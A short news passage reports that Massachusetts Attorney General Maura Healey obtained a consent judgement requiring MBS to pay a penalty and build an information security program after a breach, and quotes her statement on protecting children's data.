A consent judgement against MBS was obtained by Massachusetts Attorney General Maura Healey. That judgement requires MBS to pay a financial penalty and develop, implement, and maintain a comprehensive information security program and train staff how to handle and safeguard personal information.

Attorney General Healey said, “This settlement ensures that this company implements the necessary protections so this type of breach never happens again and sends a clear message about the importance of safeguarding the sensitive information of children and others.”
